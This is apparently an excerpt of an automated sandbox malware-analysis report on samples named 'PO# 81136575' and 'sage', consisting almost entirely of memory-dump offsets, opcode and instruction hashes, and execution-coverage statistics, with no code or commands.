• Opcode Fuzzy Hash: c6524279e1515c4e93faba9d514d39a74877267ddc6feafdfa57def7ccab75ea
• Instruction Fuzzy Hash: 1B21C835704611CBC7299B74D858A7AB3A2FFC97217158579E906CB354CF31CC038790
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 443a3b117f43062223ebf905e26080f736026a98a80ddf6d26d1d7b7e79fe41f
• Instruction ID: 1a8082a963dfac785f9e4c7c35ff171ce22fe34633bf766cf46554c1b5e544b8
• Opcode Fuzzy Hash: 443a3b117f43062223ebf905e26080f736026a98a80ddf6d26d1d7b7e79fe41f
• Instruction Fuzzy Hash: 6821C532A04114CFC308BBBDE88852EBBB9EF89200F4149A9D484D7254DE385C59C7A5
Memory Dump Source
• Source File: 00000000.00000002.1251156860.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17ad000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5dd6910158e1f84f7ceb7383c2de75a17b33c9e8ad202c076f2384f4aaba85f3
• Instruction ID: a10304fc2406ff99bfddb4c5faf56972f59218d8d1583022f77794a36d032911
• Opcode Fuzzy Hash: 5dd6910158e1f84f7ceb7383c2de75a17b33c9e8ad202c076f2384f4aaba85f3
• Instruction Fuzzy Hash: 79212271644240EFDB25DF68D8C4B27FB61EBC8314F60C6A9E80A4B742C33AD807CA61
Memory Dump Source
• Source File: 00000000.00000002.1251156860.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17ad000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fcf6ef35fcee2d59c4e12bb64ba3d7b565a70dab145ff5ee13ff506afd032e08
• Instruction ID: f58ee1606d99accc80a066e3a3b919e915325b0c455e1391e49c77d6ba105a0f
• Opcode Fuzzy Hash: fcf6ef35fcee2d59c4e12bb64ba3d7b565a70dab145ff5ee13ff506afd032e08
• Instruction Fuzzy Hash: CE21F571508240EFDB25DF98D5C0F26FB65FBC8324F60C6ADD80A4B692C33AD846CA61
Memory Dump Source
• Source File: 00000000.00000002.1258811776.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7270000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 710f4b2360e1aa70281cf52506c158c7bb082f6ba93c9960bcbb2df31b810737
• Instruction ID: 64a6de0caed97e06b9fedd5d520fa0d514c13f284624744f85700e6cf14b4c95
• Opcode Fuzzy Hash: 710f4b2360e1aa70281cf52506c158c7bb082f6ba93c9960bcbb2df31b810737
• Instruction Fuzzy Hash: 5A218871E10209CBCB14FBB8E9595ADBBB2FF88211F918469E445E3250DE389C1ACB51
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6ae1182d27ff7b624b069a70f152be81322af69e62e534ec949b599b5c535468
• Instruction ID: 78d0f527b139d344dd0857467ebf3fe685fa3f209a64c7412d5734cfd8f7400b
• Opcode Fuzzy Hash: 6ae1182d27ff7b624b069a70f152be81322af69e62e534ec949b599b5c535468
• Instruction Fuzzy Hash: 2B215E70E08219EFDB24CFA5D954BAEBBB5FF89710F104029E811A7388CBB59945CB91
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 92970d0901c4bff5d74f0880ea0dbd4c015950ff13cc2b9e004645a7c0049772
• Instruction ID: 3ba68b6df50d481d2e623ddf3ed257bc10e68095db137e8dd8ce5b0fb4028eb0
• Opcode Fuzzy Hash: 92970d0901c4bff5d74f0880ea0dbd4c015950ff13cc2b9e004645a7c0049772
• Instruction Fuzzy Hash: 3211D332F14114CBC308BBBDE94852EBBA9EB8D210F814969E884E3354DE385C5987A5
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 760cd935a8727166092635f46a7a6358c224a0d064c96eadcda2e96b6d9e2817
• Instruction ID: 406c78151de97532edf4e3a71f2e5bb0298162f7b7c43a887931c9a280428430
• Opcode Fuzzy Hash: 760cd935a8727166092635f46a7a6358c224a0d064c96eadcda2e96b6d9e2817
• Instruction Fuzzy Hash: 9A21C671B44105AFCB19DFA4E8187AA7765FFC9314F098039E9068B394CB75CC55CB90
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23e7fc6b7c095447da1844a8b8a66c9b33051913caab9209b4df8776cb334513
• Instruction ID: ecb9104ef0e7222be1e791e8a4073a2c8987dce27715469a70cc14864e5c37f8
• Opcode Fuzzy Hash: 23e7fc6b7c095447da1844a8b8a66c9b33051913caab9209b4df8776cb334513
• Instruction Fuzzy Hash: 95115136B002049FCB14DF55DC44AADBBBAFB8C710F558065E916A7354DB71AC11CB90
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7f5eb6fa07f6cc38e708d0c3ce210ff15711c3622219f43d96a95ad2ad14afe8
• Instruction ID: 791edd9609a002cb813c6f0fdab7f084082a3e5d38ec777b6c9e52a6df2f6fed
• Opcode Fuzzy Hash: 7f5eb6fa07f6cc38e708d0c3ce210ff15711c3622219f43d96a95ad2ad14afe8
• Instruction Fuzzy Hash: 4C216A35B00208DFDB14CF65D844AADBBB6FF8D310F288069E906A72A5DB32DC11CB50
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 81fd99c7906ea283c030d8b1d7805a05205d11b3d1529d51a93d11a8d44cd6f8
• Instruction ID: 78ee73716c15682bd279319ffbd26ee73652179eb8b18ac2b5794186f17e57ed
• Opcode Fuzzy Hash: 81fd99c7906ea283c030d8b1d7805a05205d11b3d1529d51a93d11a8d44cd6f8
• Instruction Fuzzy Hash: CE11E5353006119FC729AA39D89893AF7A6FFC96617194478E906CB354CF31DC028790
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28f038c4ffcf1739d2bd7e43debf25decb7398296474585856adbf7317f544b5
• Instruction ID: 177f46f260cc4d0d58ee9bd584d9aeea7bcf6a8b5e18ed98e5ec177d77e0f0f9
• Opcode Fuzzy Hash: 28f038c4ffcf1739d2bd7e43debf25decb7398296474585856adbf7317f544b5
• Instruction Fuzzy Hash: 2E1108307091405FC718567EA8646BBBAAAAFC9320F158476D506C7799CE388D0A83B1
Memory Dump Source
• Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ed973d5c5c3cdc88050c1acd0ecc3bf203884dae540e729ebd661647898c93ba
• Instruction ID: 909dd21a2fe518c88929c7e3c9c8d9ce97c8fb55be541298708fe22be7635ac7
• Opcode Fuzzy Hash: ed973d5c5c3cdc88050c1acd0ecc3bf203884dae540e729ebd661647898c93ba
• Instruction Fuzzy Hash: BE116370E08218EFDB28CFA5E8547AEBBB2FF89310F144529D811A7398DB759C45CB90
Memory Dump Source
• Source File: 00000000.00000002.1251156860.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17ad000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d4981aff5dcf7b1fdaf38f60d6a83d7629a3a1e179a2025f34979c2780b8776
• Instruction ID: ba0ca74a856ac35f46b331427095b2712fd79e73e747dcd97bdee459d213f2f5
• Opcode Fuzzy Hash: 2d4981aff5dcf7b1fdaf38f60d6a83d7629a3a1e179a2025f34979c2780b8776
• Instruction Fuzzy Hash: 65118E75908280DFDB12CF58D5C4B15FB61FB84224F24C6A9D8494B696C33AD44ACB51
Memory Dump Source
• Source File: 00000000.00000002.1251156860.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17ad000_PO# 81136575.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d4981aff5dcf7b1fdaf38f60d6a83d7629a3a1e179a2025f34979c2780b8776
• Instruction ID: 419e726ca1b58708c1d0ca0e3654f3802287fa947b1aa5a3634ad1f8a9858f89
                                                                                                                                                • Opcode Fuzzy Hash: 2d4981aff5dcf7b1fdaf38f60d6a83d7629a3a1e179a2025f34979c2780b8776
                                                                                                                                                • Instruction Fuzzy Hash: 43118E75544280DFDB22CF58D5C4B16FB61FB88314F24C6AAD8494B656C33AD44BCB61
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251044999.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_179d000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b244cc393ee308226d55dca08459fded445ddcb4eb902c6232e0e24d2c52a5a8
                                                                                                                                                • Instruction ID: 0914947afa22201eda9bb2e609faa6b40a8846e0957f6d6f9693230bad3f366d
                                                                                                                                                • Opcode Fuzzy Hash: b244cc393ee308226d55dca08459fded445ddcb4eb902c6232e0e24d2c52a5a8
                                                                                                                                                • Instruction Fuzzy Hash: 6A01F731445340AAEB305A9AE884F66FF98DF41320F18845AED4D1E283D2799448C6B1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bf6fc816a583e10a42be107d1fd810431c443c4a03aa1e6af430ad1304e4a2d1
                                                                                                                                                • Instruction ID: 7801847afae6effd2669d1e7ea7315d24e3209f27e89e880f85c8a3a24edc38f
                                                                                                                                                • Opcode Fuzzy Hash: bf6fc816a583e10a42be107d1fd810431c443c4a03aa1e6af430ad1304e4a2d1
                                                                                                                                                • Instruction Fuzzy Hash: DAF0963630020DBBCF265E55EC15BEE3B56EBCC761F108436FA09D61D1C771982197A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6c333324d6fff299c62c90271764a8b303b6d36dfe55487f1fd9f2652778f890
                                                                                                                                                • Instruction ID: 2553f556a0300d67bc5243e4275710146394de4dbc13c0b933a1f1b0b0ece6cb
                                                                                                                                                • Opcode Fuzzy Hash: 6c333324d6fff299c62c90271764a8b303b6d36dfe55487f1fd9f2652778f890
                                                                                                                                                • Instruction Fuzzy Hash: 8201817140A3C49FC72EA775A8686A17FF0DF1B21170908D7E481CA157D734954ACB62
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b5f6e0b673daabdf3e756450ca27e1806d864ece184f5cc5ac55dcfe2f327e61
                                                                                                                                                • Instruction ID: edd63781d38e2246ca6ae3bfa9dfcb19a860ddd45ee1a8f4583ccf9cfdc7567a
                                                                                                                                                • Opcode Fuzzy Hash: b5f6e0b673daabdf3e756450ca27e1806d864ece184f5cc5ac55dcfe2f327e61
                                                                                                                                                • Instruction Fuzzy Hash: 50018CB4A01209CFCB25CF58D5849AEB7F9EF89320B658069E809A7311D330ED10CB61
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251044999.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_179d000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5f466fe4143da8158955d6a43a962244c14dea7f9a537a22600b48910676a684
                                                                                                                                                • Instruction ID: 3c97ce6bb46b255352974327fbf75f88e8ada0b98b365c6ad2b789783a12c693
                                                                                                                                                • Opcode Fuzzy Hash: 5f466fe4143da8158955d6a43a962244c14dea7f9a537a22600b48910676a684
                                                                                                                                                • Instruction Fuzzy Hash: 30F0C831445240AEEB218A4ADCC4F62FF98DF41330F14C45AED0C1F283C3799848CAB1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 02e3ad98fb1559922643c037afed57e58e387fcba9212f1312872d3a466563d0
                                                                                                                                                • Instruction ID: c99bc347811757bc40d2a85f3a50dce4b6f2bef2abed9976a8d61d480c0b9879
                                                                                                                                                • Opcode Fuzzy Hash: 02e3ad98fb1559922643c037afed57e58e387fcba9212f1312872d3a466563d0
                                                                                                                                                • Instruction Fuzzy Hash: 08F09AB8A46205CFCB11CF98D5C09A9B7F6EF4D320B5680A2D809EB321E370ED01CB60
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0037f521e98f0cb39e77ebf2b061db998ef5f21e07a7b7de78754f6606ceca3c
                                                                                                                                                • Instruction ID: fafe737cc7ebaf6e294af1de6d011d7d3b2e318bfc369245f9a9bf940b5dafa5
                                                                                                                                                • Opcode Fuzzy Hash: 0037f521e98f0cb39e77ebf2b061db998ef5f21e07a7b7de78754f6606ceca3c
                                                                                                                                                • Instruction Fuzzy Hash: C1E0D863D091449FDB14CBE4E8215ADBB70FEDF211B5581C2D04BA7266D7289916C750
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a1c1127b8d028e6cf3e0dfc1732d52b2a074c22f678e9339234a453a2960187f
                                                                                                                                                • Instruction ID: 845dfd0f4fc41b95f51f6432be4354bdaec156986077922d8fae49094d642ae9
                                                                                                                                                • Opcode Fuzzy Hash: a1c1127b8d028e6cf3e0dfc1732d52b2a074c22f678e9339234a453a2960187f
                                                                                                                                                • Instruction Fuzzy Hash: 0BF06D74D18208EFCB44EFB9E4082EDBFF4EB4A311F6484AAD80993215E3310A54CB40
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 338c5e54e5d6089de054ce16050fd13448736b2968d0628cc2a9253ce06df4a6
                                                                                                                                                • Instruction ID: f314bd561c791d5f4b3ab91fb6fe01429a04be4b7f1cf000355be56327097d28
                                                                                                                                                • Opcode Fuzzy Hash: 338c5e54e5d6089de054ce16050fd13448736b2968d0628cc2a9253ce06df4a6
                                                                                                                                                • Instruction Fuzzy Hash: 6DE04F34D04208EFCB04EFAAE54829CBBF8AB49311F5084B5D80993204E7314B90CB80
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 080e727b48d394da475d21c450c75c1698229a478a6619cde7d5fdb1b4ae528a
                                                                                                                                                • Instruction ID: c526938039f93045047bd472de66bbd2fc41d89228c292c2a8cc3db575c79593
                                                                                                                                                • Opcode Fuzzy Hash: 080e727b48d394da475d21c450c75c1698229a478a6619cde7d5fdb1b4ae528a
                                                                                                                                                • Instruction Fuzzy Hash: F3E01270A01245DFC72D6F30F81D59537B4EF59211344489FF40685659DB348486CBA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                • Instruction ID: 7eccc7e6796227e5fde1534afa5de9f7597c43d7d11c22558a96f917df3268f8
                                                                                                                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                • Instruction Fuzzy Hash: 72C0807354C1382BD234504E7C40DA3774CD3C63B4E150177F51CD320054429C8501F4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1ad7e24ab0d2089258ed356abfeed135eb775436618d63f0d91d803b7cd104e9
                                                                                                                                                • Instruction ID: a893135450c27d5c5a4e0bd68654b8b6bd0509a051575dcd0f3f210c1953cc51
                                                                                                                                                • Opcode Fuzzy Hash: 1ad7e24ab0d2089258ed356abfeed135eb775436618d63f0d91d803b7cd104e9
                                                                                                                                                • Instruction Fuzzy Hash: A9E02BB1D54B056BD74ED775FCA4F483BBDEF81304F40C1A184028676AD63C8805CB21
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3b5f07e39d94bbfb4a636213b75852a9c0f27f4053868ccabf385a4ba4505841
                                                                                                                                                • Instruction ID: c9b74c3bbd5da7a3fe0c4af9f201afd461a9d0c20f95cde05edce3bcbe2d5fba
                                                                                                                                                • Opcode Fuzzy Hash: 3b5f07e39d94bbfb4a636213b75852a9c0f27f4053868ccabf385a4ba4505841
                                                                                                                                                • Instruction Fuzzy Hash: 46C02271600A0917C30CE339F828D0437AEEBC0200FC0C01091064531CDE7CAC05C3A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258811776.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7270000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2d284875d20460ab947b925fc68638be590dd2880c2e6f99a75bcb69b2dda2a0
                                                                                                                                                • Instruction ID: 68b0cb8e00083a59a1642d9257bf62185763be9a32b74f4c9e6726703b25e20f
                                                                                                                                                • Opcode Fuzzy Hash: 2d284875d20460ab947b925fc68638be590dd2880c2e6f99a75bcb69b2dda2a0
                                                                                                                                                • Instruction Fuzzy Hash: 87536DB0E14219CBCB14FFB8E99966DBBB5EB89300F8085E9D548B3340DA385D89CF55
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: F
                                                                                                                                                • API String ID: 0-2945319695
                                                                                                                                                • Opcode ID: afa91f6ab0c7793b610553b21621a1bc32f0b2cf256d43e6e151dc8fc99a2568
                                                                                                                                                • Instruction ID: c89ca4af6a28cfe8a8b872b7eca9dc740e97d9ba7503a2b2ecf3cc86afd6c8b1
                                                                                                                                                • Opcode Fuzzy Hash: afa91f6ab0c7793b610553b21621a1bc32f0b2cf256d43e6e151dc8fc99a2568
                                                                                                                                                • Instruction Fuzzy Hash: A962D071F04315CFCB15EBB8D89866EBBB2EF8A200F5185AAD449EB350DE389C45CB51
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c82ed5157266afd5341a330afa05b190cee15b3009e2b6a3eb096b9da3f2c79b
                                                                                                                                                • Instruction ID: a6f475081c8c66d91ef03bea1ee61a6f8c65d62019d11b5d31bb8a7c8059091d
                                                                                                                                                • Opcode Fuzzy Hash: c82ed5157266afd5341a330afa05b190cee15b3009e2b6a3eb096b9da3f2c79b
                                                                                                                                                • Instruction Fuzzy Hash: 66429D71F10215CFCB14EBB8D89966EBBB2FF89200F5189A9D449EB350DE389C85CB51
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 43a02e4b5facc07d1c28a062fe3e4611c0c0ae6f6eafe71fc769de669b1dacff
                                                                                                                                                • Instruction ID: af9004a5b39550f54ff89c40229635f3e7fec9e5a73c3cb7858369cbf22a58e2
                                                                                                                                                • Opcode Fuzzy Hash: 43a02e4b5facc07d1c28a062fe3e4611c0c0ae6f6eafe71fc769de669b1dacff
                                                                                                                                                • Instruction Fuzzy Hash: FB819F75B242189BDF189BB484946BFBAB7BFC8710B44C52DE442E7388CE3888068791

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage: 26%
                                                                                                                                                Dynamic/Decrypted Code Coverage: 50%
                                                                                                                                                Signature Coverage: 7.8%
                                                                                                                                                Total number of Nodes: 90
                                                                                                                                                Total number of Limit Nodes: 7

                                                                                                                                                Control-flow Graph

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6021000436.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_70d0000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2aa8ee8ee36275c72056382084307aef1065d328c6a34651d0f0fb4d5fa193e5
                                                                                                                                                • Instruction ID: 856a9bdb3be546ff69247eb62976682f33c11c319ec6848b28ce9aebbec2adcb
                                                                                                                                                • Opcode Fuzzy Hash: 2aa8ee8ee36275c72056382084307aef1065d328c6a34651d0f0fb4d5fa193e5
                                                                                                                                                • Instruction Fuzzy Hash: 38B31570A01328CFCB18EF78D98966CBBF2BB89301F4149A9D449A7354DF399E858F45
                                                                                                                                                APIs
                                                                                                                                                • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 06F6324B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateProcessUser
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2217836671-0
                                                                                                                                                • Opcode ID: b891b745d4152ae26de6ecf772171e5654334ae0439bc68de0e9cad8706df395
                                                                                                                                                • Instruction ID: 7da732d89f7f4f18f68097073a3109c800ce6318e635bcea4ad049312b750f65
                                                                                                                                                • Opcode Fuzzy Hash: b891b745d4152ae26de6ecf772171e5654334ae0439bc68de0e9cad8706df395
                                                                                                                                                • Instruction Fuzzy Hash: 7551F771D00219DFDB64CF9AC840BDDBBB5BF48314F0484AAE819B7250DB759A89CF90
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5b184e7654fe65496c87b8904a745f748d1929d86839aa0d2a914e7a04165ce9
